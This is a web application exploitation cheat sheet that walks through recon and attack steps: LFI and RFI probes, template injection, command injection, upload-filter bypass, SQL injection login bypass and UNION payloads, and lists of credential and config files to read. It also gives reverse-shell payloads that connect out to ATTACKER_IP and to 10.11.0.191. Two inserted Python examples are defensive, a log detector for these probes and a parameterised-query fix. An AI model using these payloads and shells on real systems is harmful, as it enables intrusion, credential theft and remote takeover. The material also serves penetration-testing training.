Exploiting Web Apps
Summary
If a machine exposes a web interface, run through these steps to gather as much intel as possible — chances are, at least one of them will give you the foothold you need.
# Step 1: Identify tech stack
whatweb http://<IP>
curl -I http://<IP>
curl http://<IP> | grep -iE "php|html|js|admin|version"
# Step 2: Directory brute-forcing
ffuf -u http://<IP>/FUZZ -w /usr/share/wordlists/dirb/common.txt -e .php,.txt,.bak
# Brute-force with recursion and longer list
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u http://<IP>/FUZZ/ -recursion
# Step 3: Search for common entry points
curl http://<IP>/robots.txt
curl http://<IP>/sitemap.xml
# Step 4: LFI checks
curl "http://<IP>/index.php?page=../../../../etc/passwd"
curl "http://<IP>/index.php?page=../../../../etc/passwd%00"
curl "http://<IP>/index.php?page=php://filter/convert.base64-encode/resource=index"
curl "http://<IP>/index.php?page=/var/log/apache2/access.log"
# Step 5: RFI checks (if allow_url_include=On)
curl "http://<IP>/index.php?page=http://ATTACKER_IP/shell.txt"
# Step 6: SSTI checks
curl "http://<IP>/?name={{7*7}}"
curl "http://<IP>/?q=<%= 7*7 %>"
# Step 7: Command injection
curl "http://<IP>/ping?host=127.0.0.1;id"
curl "http://<IP>/ping?host=127.0.0.1|whoami"
curl "http://<IP>/ping?host=$(id)"
# Blind command injection (use timing)
curl "http://<IP>/ping?host=127.0.0.1; sleep 5" -w "%{time_total}\n"
# Step 8: Bypass file upload filters
curl -F "file=@shell.php" http://<IP>/upload.php
mv shell.php shell.php.jpg
mv shell.php shell.pHp5
curl -F "file=@shell.pHp5" http://<IP>/upload.php
# Trigger uploaded shell
curl http://<IP>/uploads/shell.php?cmd=id
# Step 9: Bypass login page
curl -X POST -d "user=admin' -- &pass=x" http://<IP>/login.php
curl -X POST -d "user=admin&pass=' or 1=1 -- -" http://<IP>/login.php
# Step 10: Exploit vulnerable parameter
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://<IP>/?FUZZ=whoami
# Step 11: Expose headers, cookies, hidden fields
curl -I http://<IP>
curl -s http://<IP>/ | grep -iE "Set-Cookie|csrf|token|auth"
# Step 12: Crawl site to discover endpoints
gobuster dir -u http://<IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,bak,zip
# Step 13: Test admin panels / login
curl http://<IP>/admin/
curl http://<IP>/login.php
curl http://<IP>/wp-login.php
# Step 14: Look for backup/config files
curl http://<IP>/.git/config
curl http://<IP>/config.php.bak
curl http://<IP>/index.php~
# Step 15: Grab initial shell via web-based RCE
curl http://<IP>/rce.php?cmd=nc+-e+/bin/bash+ATTACKER_IP+PORT
# Step 16: After shell, upgrade TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z → `stty raw -echo; fg`
export TERM=xterm
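Seen from the other side of the wire, every probe in Steps 4 to 10 leaves a recognisable request in the web server's access log. The following detector is an added example, not part of the original cheat sheet: it percent-decodes the request target of combined-format access log lines and flags traversal, php:// wrappers, null bytes, template expressions, shell metacharacters and SQL quote/comment tricks. The log lines are constructed, and the rule set and names are my own.

```python
# Added example: flag the checklist's probe patterns in constructed access-log lines.
import re
from urllib.parse import unquote

# Each rule is (name, regex) applied to the percent-decoded request target.
RULES = [
    ("lfi_traversal", re.compile(r"\.\./|\.\.\\")),
    ("lfi_wrapper", re.compile(r"php://|data:|expect://", re.I)),
    ("null_byte", re.compile(r"\x00")),
    ("rfi_remote_include", re.compile(r"[?&][a-z_]+=https?://", re.I)),
    ("ssti_probe", re.compile(r"\{\{.*?\}\}|<%=.*?%>|\$\{.*?\}")),
    ("cmd_injection", re.compile(r"[;|`]|\$\(|\bsleep\s+\d+", re.I)),
    ("sqli_probe", re.compile(r"'\s*(or|and|union|--|#)|1=1|sleep\(|waitfor\s+delay", re.I)),
]

# Combined log format: ip - - [time] "METHOD target HTTP/x" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def classify(line):
    """Return the names of all rules that match one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    target = unquote(m.group("target"))  # decode %2e%2e, %00, %7b... before matching
    return [name for name, rx in RULES if rx.search(target)]

SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:12:00:01 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 9000',
    '10.0.0.9 - - [01/Jan/2024:12:00:03 +0000] "GET /?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 100',
    '10.0.0.9 - - [01/Jan/2024:12:00:04 +0000] "GET /ping?host=127.0.0.1;%20sleep%205 HTTP/1.1" 200 100',
    '10.0.0.9 - - [01/Jan/2024:12:00:05 +0000] "POST /login.php HTTP/1.1" 302 0',
]

def scan(lines):
    """Yield (ip, target, hits) for every line that trips at least one rule."""
    for line in lines:
        hits = classify(line)
        if hits:
            m = LOG_RE.match(line)
            yield m.group("ip"), m.group("target"), hits

if __name__ == "__main__":
    for ip, target, hits in scan(SAMPLE_LOG):
        print(f"{ip} {','.join(hits):28} {target}")
```

A POST body (Step 9's login payloads) is not in the access log, so those need request-body or application logging to catch.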
SQL Injection
Payloads
'
)'
"
`
')
")
`)
'))
"))
`))
'-SLEEP(30); #
Login Bypass
# Both user and password or specific username and payload as password
' or 1=1 --
' or '1'='1
' or 1=1 --+
user' or 1=1;#
user' or 1=1 LIMIT 1;#
user' or 1=1 LIMIT 0,1;#
UNION BASED SQL
order by 1   -- increase until it errors to find the column count
' UNION SELECT 1,2,3 -- -
' UNION SELECT 1,@@version,3 -- -
' UNION SELECT 1,user(),3 -- -
' UNION SELECT 1,load_file('/etc/passwd'),3 -- -
' UNION SELECT 1,load_file(0x2f6574632f706173737764),3 -- -   // hex encoded /etc/passwd
' UNION SELECT 1,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),3 -- -   // char encoded /etc/passwd
MSSQL
'; WAITFOR DELAY '00:00:30'; --
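To see why the login-bypass payloads above work and what closes the hole, here is an added example (not from the original page): the same login check written once with string concatenation, as a vulnerable PHP login would do it, and once with bound parameters. It uses an in-memory SQLite table with constructed rows; SQLite honours the `--` comment, so the `--` payloads from the list apply unchanged.

```python
# Added example: string-built login query beside its parameterised fix.
import sqlite3

def make_db():
    """Constructed users table; the rows and passwords are made up."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, user TEXT, pass TEXT)")
    db.executemany("INSERT INTO users VALUES (?,?,?)",
                   [(1, "admin", "S3cret!"), (2, "bob", "hunter2")])
    return db

def login_vulnerable(db, user, pw):
    """Concatenation: a quote in the input ends the literal and '--' comments out the rest."""
    sql = f"SELECT id FROM users WHERE user='{user}' AND pass='{pw}'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_fixed(db, user, pw):
    """Placeholders: the input is bound as data and never parsed as SQL."""
    row = db.execute("SELECT id FROM users WHERE user=? AND pass=?", (user, pw)).fetchone()
    return row[0] if row else None

def demo():
    """Run each case through both versions; returns (vulnerable_result, fixed_result)."""
    db = make_db()
    cases = {
        "legit": ("admin", "S3cret!"),
        "comment_user": ("admin' -- ", "x"),        # user=admin' -- &pass=x
        "or_true_pass": ("bob", "' or 1=1 -- -"),   # pass=' or 1=1 -- -
    }
    return {name: (login_vulnerable(db, u, p), login_fixed(db, u, p))
            for name, (u, p) in cases.items()}

if __name__ == "__main__":
    for name, (vuln, fixed) in demo().items():
        print(f"{name:14} vulnerable={vuln!r:5} fixed={fixed!r}")
```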
LFI - enumerating interesting files
Suppose you have Local File Inclusion (LFI) on a system, allowing you to read files. You might find plaintext passwords to gain an initial foothold into the machine. What should you look for?
Linux
# Interesting files
/etc/passwd # get username from here
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
# SSH keys
/home/<username>/.ssh/id_rsa # or id_ecdsa, id_ecdsa_sk, id_ed25519, id_ed25519_sk, id_dsa
# Log Files
## Apache access log:
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/httpd/access_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/httpd/error_log
/var/log/cron.log
/var/log/secure or /var/log/auth.log
# CMS Config Files
WordPress: /var/www/html/wp-config.php
Joomla: /var/www/configuration.php
Dolphin CMS: /var/www/html/inc/header.inc.php
Drupal: /var/www/html/sites/default/settings.php
Mambo: /var/www/configuration.php
PHPNuke: /var/www/config.php
PHPbb: /var/www/config.php
# user specific
.bash_history
.mysql_history
.my.cnf
Windows
C:/Windows/System32/drivers/etc/hosts
# Unattended-install answer files, may contain plaintext or base64 passwords
C:/Windows/Panther/Unattend/Unattended.xml
C:/Windows/Panther/Unattended.xml
C:/Windows/Panther/Unattend.txt
C:/Unattend.xml
C:/Autounattend.xml
C:/Windows/system32/sysprep
C:/inetpub/wwwroot/
C:/inetpub/wwwroot/web.config
C:/inetpub/logs/logfiles/
C:/documents and settings/administrator/desktop/desktop.ini
C:/documents and settings/administrator/ntuser.dat
C:/documents and settings/administrator/ntuser.ini
C:/users/administrator/desktop/desktop.ini
C:/users/administrator/ntuser.dat
C:/users/administrator/ntuser.ini
C:/windows/windowsupdate.log
# SSH private keys
C:/Users/<username>/.ssh/id_rsa
# XAMPP
C:/xampp/apache/conf/httpd.conf
C:/xampp/security/webdav.htpasswd
C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log
C:/xampp/tomcat/conf/tomcat-users.xml
C:/xampp/tomcat/conf/web.xml
C:/xampp/webalizer/webalizer.conf
C:/xampp/webdav/webdav.txt
C:/xampp/apache/bin/php.ini
# logs
c:\Program Files\Apache Group\Apache\logs\access.log
c:\Program Files\Apache Group\Apache\logs\error.log
# fingerprinting
c:\WINDOWS\system32\eula.txt
c:\boot.ini
c:\WINDOWS\win.ini
c:\WINNT\win.ini
c:\WINDOWS\Repair\SAM
c:\WINDOWS\php.ini
c:\WINNT\php.ini
c:\Program Files\Apache Group\Apache\conf\httpd.conf
c:\Program Files\Apache Group\Apache2\conf\httpd.conf
c:\Program Files\xampp\apache\conf\httpd.conf
c:\php\php.ini
c:\php5\php.ini
c:\php4\php.ini
c:\apache\php\php.ini
c:\xampp\apache\bin\php.ini
c:\home2\bin\stable\apache\php.ini
c:\home\bin\stable\apache\php.ini
LFI to Shell
RFI
A remote file inclusion vulnerability lets the attacker execute a script on the target machine even though the script itself is hosted elsewhere.
# Example
http://example.com/index.php?page=http://attackerserver.com/evil.txt
# Evil looks like this
<?php echo shell_exec("whoami");?>
# Or just get a reverse shell directly like this:
<?php echo system("0<&196;exec 196<>/dev/tcp/10.11.0.191/443; sh <&196 >&196 2>&196"); ?>